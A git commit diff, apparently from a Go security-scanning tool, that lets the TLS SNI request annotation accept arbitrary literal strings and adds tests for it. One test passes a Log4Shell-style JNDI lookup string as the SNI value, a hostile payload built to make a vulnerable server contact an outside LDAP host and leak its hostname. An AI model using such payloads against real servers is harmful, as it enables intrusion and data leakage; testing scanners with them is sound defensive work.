http: support arbitrary strings on TLS SNI annotation (#4462)

2023-12-06 09:45:30 +01:00 · 2023-12-06 09:45:30 +01:00 · 7da3921c12
parent 73982ac757
commit 7da3921c12
2 changed files with 39 additions and 3 deletions
--- a/pkg/protocols/http/request_annotations.go
+++ b/pkg/protocols/http/request_annotations.go
@ -2,6 +2,7 @@ package http

 import (
 	"context"
+	"crypto/tls"
 	"net"
 	"regexp"
 	"strings"
@ -87,10 +88,8 @@ func (r *Request) parseAnnotations(rawRequest string, request *retryablehttp.Req
 	if hosts := reSniAnnotation.FindStringSubmatch(rawRequest); len(hosts) > 0 {
 		value := strings.TrimSpace(hosts[1])
 		value = stringsutil.TrimPrefixAny(value, "http://", "https://")
-		if idxForwardSlash := strings.Index(value, "/"); idxForwardSlash >= 0 {
-			value = value[:idxForwardSlash]
-		}

+		var literal bool
 		switch value {
 		case "request.host":
 			value = request.Host
@ -99,9 +98,15 @@ func (r *Request) parseAnnotations(rawRequest string, request *retryablehttp.Req
 				value = interactshURL
 			}
 			overrides.interactshURLs = append(overrides.interactshURLs, value)
+		default:
+			literal = true
 		}
 		ctx := context.WithValue(request.Context(), fastdialer.SniName, value)
 		request = request.Clone(ctx)
+
+		if literal {
+			request.TLS = &tls.ConnectionState{ServerName: value}
+		}
 		modified = true
 	}

--- a/pkg/protocols/http/request_annotations_test.go
+++ b/pkg/protocols/http/request_annotations_test.go
@ -10,6 +10,37 @@ import (
 	"github.com/stretchr/testify/require"
 )

+func TestRequestParseAnnotationsSNI(t *testing.T) {
+	t.Run("compliant-SNI-value", func(t *testing.T) {
+		req := &Request{connConfiguration: &httpclientpool.Configuration{}}
+		rawRequest := `@tls-sni: github.com
+		GET / HTTP/1.1
+		Host: {{Hostname}}`
+
+		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
+		require.Nil(t, err, "could not create http request")
+
+		overrides, modified := req.parseAnnotations(rawRequest, httpReq)
+		require.True(t, modified, "could not apply request annotations")
+		require.Equal(t, "github.com", overrides.request.TLS.ServerName)
+		require.Equal(t, "example.com", overrides.request.URL.Hostname())
+	})
+	t.Run("non-compliant-SNI-value", func(t *testing.T) {
+		req := &Request{connConfiguration: &httpclientpool.Configuration{}}
+		rawRequest := `@tls-sni: ${jndi:ldap://${hostName}.test.com}
+		GET / HTTP/1.1
+		Host: {{Hostname}}`
+
+		httpReq, err := retryablehttp.NewRequest(http.MethodGet, "https://example.com", nil)
+		require.Nil(t, err, "could not create http request")
+
+		overrides, modified := req.parseAnnotations(rawRequest, httpReq)
+		require.True(t, modified, "could not apply request annotations")
+		require.Equal(t, "${jndi:ldap://${hostName}.test.com}", overrides.request.TLS.ServerName)
+		require.Equal(t, "example.com", overrides.request.URL.Hostname())
+	})
+}
+
 func TestRequestParseAnnotationsTimeout(t *testing.T) {
 	t.Run("positive", func(t *testing.T) {
 		request := &Request{